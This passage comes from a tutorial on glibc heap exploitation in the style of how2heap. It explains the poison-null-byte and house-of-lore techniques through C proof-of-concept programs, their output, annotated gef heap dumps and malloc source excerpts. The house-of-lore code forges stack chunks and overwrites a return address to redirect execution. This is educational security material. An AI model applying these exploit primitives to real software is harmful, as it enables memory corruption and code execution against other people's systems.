    fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
    b1 = malloc(0x80);
    memset(b1, 'A', 0x80);
    fprintf(stderr, "We malloc 'b1': %p\n", b1);
    fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr);
    fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4));

    b2 = malloc(0x40);
    memset(b2, 'A', 0x40);
    fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2);

    // deal with tcache
    // for (i = 0; i < 7; i++) {
    //     k[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(k[i]);
    // }
    free(b1);
    free(c);
    fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");

    d = malloc(0x110);
    fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d);

    fprintf(stderr, "b2 content:%s\n", b2);
    memset(d, 'B', 0xb0);
    fprintf(stderr, "New b2 content:%s\n", b2);
}
$ gcc -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xabb010
'real' size of 'a': 0x18
b: 0xabb030
c: 0xabb140
b.size: 0x111 ((0x100 + 0x10) | prev_in_use)

After free(b), c.prev_size: 0x110
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100

Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P))
We malloc 'b1': 0xabb030
c.prev_size: 0x110
fake c.prev_size: 0x70

We malloc 'b2', our 'victim' chunk: 0xabb0c0
Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').
Finally, we allocate 'd', overlapping 'b2': 0xabb030

b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

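This technique applies when some malloc'd memory region has a single-byte overflow. By overflowing into the size field of the next chunk, the attacker can create overlapping chunks on the heap and so overwrite other data. Combined with other techniques, this can also lead to control of the program.

Single-byte overflows can be exploited in the following ways:

Extending a freed chunk: when the chunk after the overflowing chunk is free and sits in the unsorted bin, overflow one byte to enlarge its size. The next time this chunk is allocated, it overlaps the chunk after it, enabling a further overflow.

  0x100   0x100    0x80
|-------|-------|-------|
|   A   |   B   |   C   |   initial state
|-------|-------|-------|
|   A   |   B   |   C   |   free B
|-------|-------|-------|
|   A   |   B   |   C   |   overflow B's size to 0x180
|-------|-------|-------|
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   chunk C is overlapped
        |<-what we get->|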

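Extending an allocated chunk: when the chunk after the overflowing chunk is in use, the overflowed byte must be chosen carefully so that consolidation succeeds when that chunk is freed, for example by adding the size of the following chunk so that it is completely covered. The next allocation of the corresponding size then returns the enlarged chunk, enabling a further overflow.

  0x100   0x100    0x80
|-------|-------|-------|
|   A   |   B   |   C   |   initial state
|-------|-------|-------|
|   A   |   B   |   C   |   overflow B's size to 0x180
|-------|-------|-------|
|   A   |   B   |   C   |   free B
|-------|-------|-------|
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   chunk C is overlapped
        |<-what we get->|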

Shrinking a freed chunk: this covers the case where the overflowed byte can only be 0, which is the poison-null-byte of this section. The size of the next, already freed chunk is reduced. When that chunk is later split, the prev_size field of the chunk after it is no longer updated correctly, which leads to overlapping chunks on free.

  0x100     0x210     0x80
|-------|---------------|-------|
|   A   |       B       |   C   |   initial state
|-------|---------------|-------|
|   A   |       B       |   C   |   free B
|-------|---------------|-------|
|   A   |       B       |   C   |   overflow B's size to 0x200
|-------|---------------|-------|   later mallocs do not update C's prev_size
         0x100  0x80
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8), malloc(0x80-8)
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   free B1
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   free C, C is consolidated with B1
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8)
|-------|------|-----|--|-------|   B2 is overlapped
        |<--we get-->|

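house of einherjar: this also covers the case where the overflowed byte can only be 0, but here the overflow is used to rewrite the prev_size field of the chunk after the overflowing one, so that when that chunk is freed it finds an earlier, legitimately freed chunk and consolidates with it, producing overlapping chunks.

  0x100   0x100   0x101
|-------|-------|-------|
|   A   |   B   |   C   |   initial state
|-------|-------|-------|
|   A   |   B   |   C   |   free A
|-------|-------|-------|
|   A   |   B   |   C   |   overflow B: C's size becomes 0x100 and its prev_size is set to 0x200
|-------|-------|-------|
|   A   |   B   |   C   |   free C
|-------|-------|-------|
|   A   |   B   |   C   |   C is consolidated with A
|-------|-------|-------|   chunk B is overlapped
|<-----what we get----->|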

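First we allocate three chunks. The type of the first does not matter, but the latter two must not be fast chunks, since fast chunks are not consolidated when freed. Here chunk a is used to produce the single-byte overflow that overwrites the lowest byte of chunk b's size field, and chunk c helps forge the fake chunk.

For the overflow we need to know the actual usable size of a chunk (because of space reuse it may be slightly larger than the requested size). The function that returns this size, malloc_usable_size, is as follows: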

/*
   ------------------------- malloc_usable_size -------------------------
 */
static size_t
musable (void *mem)
{
  mchunkptr p;
  if (mem != 0)
    {
      p = mem2chunk (mem);

      [...]
      if (chunk_is_mmapped (p))
        return chunksize (p) - 2 * SIZE_SZ;
      else if (inuse (p))
        return chunksize (p) - SIZE_SZ;
    }
  return 0;
}
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
/* extract p's inuse bit */
#define inuse(p)                                  \
  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
/* Get size, ignoring use bits */
#define chunksize(p)         ((p)->size & ~(SIZE_BITS))

So real_a_size = chunksize(a) - 0x8 == 0x18. Note also that the allocator decides whether a chunk is in use by looking at the PREV_INUSE flag of the next chunk.
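The sizes that show up in this example follow from how a request is rounded up to a chunk size. The sketch below mirrors that rounding under the assumption of a 64-bit target (SIZE_SZ of 8, 16-byte alignment, minimum chunk size 0x20); request_to_chunk_size and usable_size are hypothetical names, not glibc functions.

```c
#include <assert.h>
#include <stddef.h>

#define SIZE_SZ            8u                    /* assumption: 64-bit target */
#define MALLOC_ALIGN_MASK  (2 * SIZE_SZ - 1)
#define MINSIZE            0x20u

/* Chunk size chosen for a request: add the size word, then round up to
 * the alignment, with MINSIZE as the floor. */
size_t request_to_chunk_size(size_t req)
{
    size_t padded = req + SIZE_SZ + MALLOC_ALIGN_MASK;

    return padded < MINSIZE ? MINSIZE : (padded & ~(size_t)MALLOC_ALIGN_MASK);
}

/* Usable bytes of an in-use, non-mmapped chunk: chunksize(p) - SIZE_SZ. */
size_t usable_size(size_t req)
{
    return request_to_chunk_size(req) - SIZE_SZ;
}
```

A request of 0x10 gives a 0x20 chunk with 0x18 usable bytes, and the requests 0x100, 0x80 and 0x40 give chunk sizes 0x110, 0x90 and 0x50, the values that appear in the program output and heap dumps.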

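So that the unlink check still passes after chunk b's size field is modified, we need to forge a c.prev_size field. Its value is easy to compute: 0x100 == (0x111 & 0xff00), which is exactly the size left after the NULL byte overflow. We then free chunk b, which is placed in the unsorted bin with size 0x110. The heap layout at this point is: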

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000111  <-- chunk b [be freed]
0x603030:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603040:    0x0000000000000000    0x0000000000000000
0x603050:    0x0000000000000000    0x0000000000000000
0x603060:    0x0000000000000000    0x0000000000000000
0x603070:    0x0000000000000000    0x0000000000000000
0x603080:    0x0000000000000000    0x0000000000000000
0x603090:    0x0000000000000000    0x0000000000000000
0x6030a0:    0x0000000000000000    0x0000000000000000
0x6030b0:    0x0000000000000000    0x0000000000000000
0x6030c0:    0x0000000000000000    0x0000000000000000
0x6030d0:    0x0000000000000000    0x0000000000000000
0x6030e0:    0x0000000000000000    0x0000000000000000
0x6030f0:    0x0000000000000000    0x0000000000000000
0x603100:    0x0000000000000000    0x0000000000000000
0x603110:    0x0000000000000000    0x0000000000000000
0x603120:    0x0000000000000100    0x0000000000000000      <-- fake c.prev_size
0x603130:    0x0000000000000110    0x0000000000000090  <-- chunk c
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
 →   Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE)

The key step is to overwrite chunk b's size field through the overflow:

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000100  <-- chunk b [be freed]
0x603030:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603040:    0x0000000000000000    0x0000000000000000
0x603050:    0x0000000000000000    0x0000000000000000
0x603060:    0x0000000000000000    0x0000000000000000
0x603070:    0x0000000000000000    0x0000000000000000
0x603080:    0x0000000000000000    0x0000000000000000
0x603090:    0x0000000000000000    0x0000000000000000
0x6030a0:    0x0000000000000000    0x0000000000000000
0x6030b0:    0x0000000000000000    0x0000000000000000
0x6030c0:    0x0000000000000000    0x0000000000000000
0x6030d0:    0x0000000000000000    0x0000000000000000
0x6030e0:    0x0000000000000000    0x0000000000000000
0x6030f0:    0x0000000000000000    0x0000000000000000
0x603100:    0x0000000000000000    0x0000000000000000
0x603110:    0x0000000000000000    0x0000000000000000
0x603120:    0x0000000000000100    0x0000000000000000      <-- fake c.prev_size
0x603130:    0x0000000000000110    0x0000000000000090  <-- chunk c
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
 →   Chunk(addr=0x603030, size=0x100, flags=)

Now, using the calculation from the previous section:

chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100
prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100

the check passes. The chunk in the unsorted bin now also has size 0x100.
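The effect of the NUL byte and the reason the forged value is consulted can be replayed on an array of 8-byte words laid out like chunk b in the dump. This is a sketch under the assumption of a little-endian 64-bit target; the function names and the array b are hypothetical and only model the heap, they do not touch it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* What a one-byte NUL overflow does to a little-endian size field. */
uint64_t null_byte_overflow(uint64_t size_field)
{
    return size_field & ~(uint64_t)0xff;
}

/* chunksize(P) == prev_size(next_chunk(P)), with words[] starting at P. */
int size_matches_next_prev_size(const uint64_t *words, size_t nwords)
{
    uint64_t size = words[1] & ~(uint64_t)0x7;
    size_t next = (size_t)(size / 8);

    return next < nwords && words[next] == size;
}

/* Rebuilds chunk b from the dump and returns 1 if the check holds after
 * the overflow, i.e. the forged value at b + 0xf0 is the one consulted. */
int shrunk_b_passes_check(void)
{
    uint64_t b[36] = {0};          /* words from chunk b's header onward */

    b[1]  = 0x111;                 /* b.size */
    b[32] = 0x100;                 /* fake c.prev_size, written at b + 0xf0 */
    b[34] = 0x110;                 /* real c.prev_size, set by free(b) */
    b[35] = 0x90;                  /* c.size, PREV_INUSE cleared */

    b[1] = null_byte_overflow(b[1]);
    return b[1] == 0x100 && size_matches_next_prev_size(b, 36);
}
```

In this model the size drops from 0x111 to 0x100 and the check then reads the forged word at offset 0x100 instead of the real c.prev_size at offset 0x110.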

Next we allocate two chunks of arbitrary size; malloc carves suitably sized pieces out of the unsorted bin chunk and returns them to the user:

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000091  <-- chunk b1  <-- fake chunk b
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x4141414141414141    0x4141414141414141
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000000051  <-- chunk b2  <-- 'victim' chunk
0x6030c0:    0x4141414141414141    0x4141414141414141
0x6030d0:    0x4141414141414141    0x4141414141414141
0x6030e0:    0x4141414141414141    0x4141414141414141
0x6030f0:    0x4141414141414141    0x4141414141414141
0x603100:    0x0000000000000000    0x0000000000000021  <-- unsorted bin
0x603110:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603120:    0x0000000000000020    0x0000000000000000      <-- fake c.prev_size
0x603130:    0x0000000000000110    0x0000000000000090  <-- chunk c
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
 →   Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)

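Something interesting happens here: after the allocations, it is the fake c.prev_size that changes, not c.prev_size. Chunk c therefore still believes that a free chunk of size 0x110 sits where chunk b was, although that memory has in fact been handed out as chunk b1.

Now for the decisive step. As we know, two adjacent small chunks are consolidated when they are freed. We first free chunk b1, which makes fake chunk b look like a free chunk. We then free chunk c: the allocator sees that the chunk before chunk c is free, merges the two, takes the result out of the unsorted bin and merges it into the top chunk. Chunk b2, which lies between chunk b1 and chunk c, is simply ignored. malloc now considers this whole region unallocated, as the new top chunk pointer shows.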

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000020fe1  <-- top chunk
0x603030:    0x0000000000603100    0x00007ffff7dd1b78
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x4141414141414141    0x4141414141414141
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000090    0x0000000000000050  <-- chunk b2  <-- 'victim' chunk
0x6030c0:    0x4141414141414141    0x4141414141414141
0x6030d0:    0x4141414141414141    0x4141414141414141
0x6030e0:    0x4141414141414141    0x4141414141414141
0x6030f0:    0x4141414141414141    0x4141414141414141
0x603100:    0x0000000000000000    0x0000000000000021  <-- unsorted bin
0x603110:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603120:    0x0000000000000020    0x0000000000000000
0x603130:    0x0000000000000110    0x0000000000000090
0x603140:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
 →   Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)

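Consolidation proceeds as follows: the chunk is first merged with the previous chunk, then the next chunk is checked. If it is not the top chunk, the merged chunk is put back into the unsorted bin; otherwise it is merged into the top chunk: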

    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }

    if (nextchunk != av->top) {
    /*
  Place the chunk in unsorted chunk list. Chunks are
  not placed into regular bins until after they have
  been given one chance to be used in malloc.
    */
      [...]
    }

    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */

    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }
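The backward consolidation step trusts the stale prev_size of chunk c, and simple address arithmetic shows that the merged region swallows chunk b2. The following sketch uses the addresses from the dumps in this section; consolidate_backward_start, range_inside and b2_is_swallowed are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

/* Start address of the merged chunk after "consolidate backward". */
uint64_t consolidate_backward_start(uint64_t chunk_addr, uint64_t prev_size)
{
    return chunk_addr - prev_size;   /* chunk_at_offset(p, -prevsize) */
}

/* 1 if [start, start+size) lies entirely inside [outer, outer+outer_size). */
int range_inside(uint64_t start, uint64_t size,
                 uint64_t outer, uint64_t outer_size)
{
    return start >= outer && start + size <= outer + outer_size;
}

/* Chunk c sits at 0x603130 with a stale prev_size of 0x110, and chunk b2
 * sits at 0x6030b0 with size 0x50. */
int b2_is_swallowed(void)
{
    uint64_t c = 0x603130, c_size = 0x90, stale_prev_size = 0x110;
    uint64_t merged = consolidate_backward_start(c, stale_prev_size);
    uint64_t merged_size = stale_prev_size + c_size;

    return merged == 0x603020
        && range_inside(0x6030b0, 0x50, merged, merged_size);
}
```

The merged chunk starts at 0x603020, the old header of chunk b, so the still allocated chunk b2 lies inside memory that the allocator now treats as free.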

Next we request a large block, large enough to include chunk b2, which puts chunk b2 entirely under our control.

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000121  <-- chunk d
0x603030:    0x4242424242424242    0x4242424242424242
0x603040:    0x4242424242424242    0x4242424242424242
0x603050:    0x4242424242424242    0x4242424242424242
0x603060:    0x4242424242424242    0x4242424242424242
0x603070:    0x4242424242424242    0x4242424242424242
0x603080:    0x4242424242424242    0x4242424242424242
0x603090:    0x4242424242424242    0x4242424242424242
0x6030a0:    0x4242424242424242    0x4242424242424242
0x6030b0:    0x4242424242424242    0x4242424242424242  <-- chunk b2  <-- 'victim' chunk
0x6030c0:    0x4242424242424242    0x4242424242424242
0x6030d0:    0x4242424242424242    0x4242424242424242
0x6030e0:    0x4141414141414141    0x4141414141414141
0x6030f0:    0x4141414141414141    0x4141414141414141
0x603100:    0x0000000000000000    0x0000000000000021  <-- small bins
0x603110:    0x00007ffff7dd1b88    0x00007ffff7dd1b88      <-- fd, bk pointer
0x603120:    0x0000000000000020    0x0000000000000000
0x603130:    0x0000000000000110    0x0000000000000090
0x603140:    0x0000000000000000    0x0000000000020ec1  <-- top chunk
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x603100, bk=0x603100
 →   Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)

还有个事情值得注意，在分配 chunk d 时，由于在 unsorted bin 中没有找到适合的 chunk，malloc 就将 unsorted bin 中的 chunk 都整理回各自的 bins 中了，这里就是 small bins。

Finally, consider libc-2.26. The technique is unchanged as long as tcache is dealt with: fill the tcache bins of both sizes involved.

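Building with AddressSanitizer reports a heap-buffer-overflow. Note that with the sanitizer enabled the "real" size is reported as the plain 0x10, most likely because ASan substitutes its own allocator, which reports the requested size as the usable size.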

$ gcc -fsanitize=address -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0x60200000eff0
'real' size of 'a': 0x10
b: 0x611000009f00
c: 0x60c00000bf80
=================================================================
==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990
READ of size 8 at 0x611000009ef8 thread T0
    #0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22
    #1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978)

0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000)
allocated by thread T0 here:
    #0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15
    #2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

house_of_lore

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main() {
    intptr_t *victim = malloc(0x80);
    memset(victim, 'A', 0x80);
    void *p5 = malloc(0x10);
    memset(p5, 'A', 0x10);
    intptr_t *victim_chunk = victim - 2;
    fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);

    intptr_t* stack_buffer_1[4] = {0};
    intptr_t* stack_buffer_2[3] = {0};
    stack_buffer_1[0] = 0;
    stack_buffer_1[2] = victim_chunk;
    stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
    stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
    fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
    fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);

    free((void*)victim);
    fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    void *p2 = malloc(0x100);
    fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
    fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    victim[1] = (intptr_t)stack_buffer_1;
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

    void *p3 = malloc(0x40);
    char *p4 = malloc(0x80);
    memset(p4, 'A', 0x10);
    fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
    fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);

    intptr_t sc = (intptr_t)jackpot;
    memcpy((p4+40), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x1b2e010
stack_buffer_1: 0x7ffe5c570350
stack_buffer_2: 0x7ffe5c570330

Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin
victim->fd: 0x7f239d4c9b78
victim->bk: 0x7f239d4c9b78

Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0
The victim chunk 0x1b2e010 will be inserted in front of the SmallBin
victim->fd: 0x7f239d4c9bf8
victim->bk: 0x7f239d4c9bf8

Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360
The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8

Nice jump d00d

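The earlier techniques showed how to forge a single fake chunk. Here we go one step further and forge a small bin chain.

First create two chunks. The first is the victim chunk and must be a small chunk; the second can be any size and only exists to keep the victim from being merged into the top chunk when it is freed. Then forge two fake chunks on the stack: fake chunk 1 has fd pointing to the victim chunk and bk pointing to fake chunk 2, and fake chunk 2 has fd pointing to fake chunk 1. That is almost a complete small bin chain: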

gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000000    0x0000000000000021  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007fffffffdc50    0x0000000000400aed      <-- fd->fake chunk 1
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- fake chunk 1
0x7fffffffdc60:    0x0000000000603000    0x00007fffffffdc30      <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00

malloc checks the small bin list as follows:

          [...]

          else
            {
              bck = victim->bk;
              if (__glibc_unlikely (bck->fd != victim))
                {
                  errstr = "malloc(): smallbin double linked list corrupted";
                  goto errout;
                }
              set_inuse_bit_at_offset (victim, nb);
              bin->bk = bck;
              bck->fd = bin;

              [...]

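That is, malloc checks that the fd pointer of the chunk referenced by victim->bk points back to victim, which is how it detects a corrupted small bin. When the victim is handed out, fake chunk 1 passes the check because its fd points to the victim; when fake chunk 1 is handed out in turn, the same check is applied to fake chunk 2. This is why the first two chunks of the bin must both be forged.

Next free the victim chunk. It goes into the unsorted bin, with fd and bk both pointing to the head of the unsorted bin: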

gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000091  <-- victim chunk [be freed]
0x603010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000090    0x0000000000000020  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603000, bk=0x603000
 →   Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)

Now request a large chunk, just large enough that malloc cannot satisfy it from the unsorted bin. The chunk sitting in the unsorted bin is then sorted into the bin it belongs to, here the small bins:

gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[8]: fw=0x603000, bk=0x603000
 →   Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)

Next comes the crucial step. Assume a vulnerability lets us modify the bk pointer of the victim chunk; we point bk at the fake small bin laid out on the stack:

gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000091  <-- victim chunk [be freed]
0x603010:    0x00007ffff7dd1bf8    0x00007fffffffdc50      <-- bk->fake chunk 1
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x4141414141414141
0x603060:    0x4141414141414141    0x4141414141414141
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000090    0x0000000000000020  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000000111  <-- chunk p2
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007fffffffdc50    0x0000000000400aed      <-- fd->fake chunk 1
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- fake chunk 1
0x7fffffffdc60:    0x0000000000603000    0x00007fffffffdc30     <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00

Small bins are first in, first out: chunks are inserted at the head of the list and removed from the tail. At this point the whole chain looks like this:

HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> victim chunk <-> TAIL

fd: ->
bk: <-

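The bk of fake chunk 2 points to an undefined address. If the address of HEAD could be obtained, for example through a memory leak, and written there, the chain would be closed. That is entirely unnecessary here.

The first malloc that follows returns the victim chunk. Things would be slightly simpler if the requested size matched the victim chunk exactly, but here we deliberately request a smaller size. malloc takes the victim chunk from the tail of the small bin, splits off a piece that is returned as chunk p3, and puts the remainder into the unsorted bin. The small bin now looks like this: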

HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> TAIL
gef➤  x/26gx victim-2
0x603000:    0x0000000000000000    0x0000000000000051  <-- chunk p3
0x603010:    0x00007ffff7dd1bf8    0x00007fffffffdc50
0x603020:    0x4141414141414141    0x4141414141414141
0x603030:    0x4141414141414141    0x4141414141414141
0x603040:    0x4141414141414141    0x4141414141414141
0x603050:    0x4141414141414141    0x0000000000000041  <-- unsorted bin
0x603060:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x603070:    0x4141414141414141    0x4141414141414141
0x603080:    0x4141414141414141    0x4141414141414141
0x603090:    0x0000000000000040    0x0000000000000020  <-- chunk p5
0x6030a0:    0x4141414141414141    0x4141414141414141
0x6030b0:    0x0000000000000000    0x0000000000000111  <-- chunk p2
0x6030c0:    0x0000000000000000    0x0000000000000000
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007fffffffdc50    0x0000000000400aed      <-- fd->fake chunk 1
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- fake chunk 1
0x7fffffffdc60:    0x00007ffff7dd1bf8    0x00007fffffffdc30      <-- fd->TAIL, bk->fake chunk 2
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00
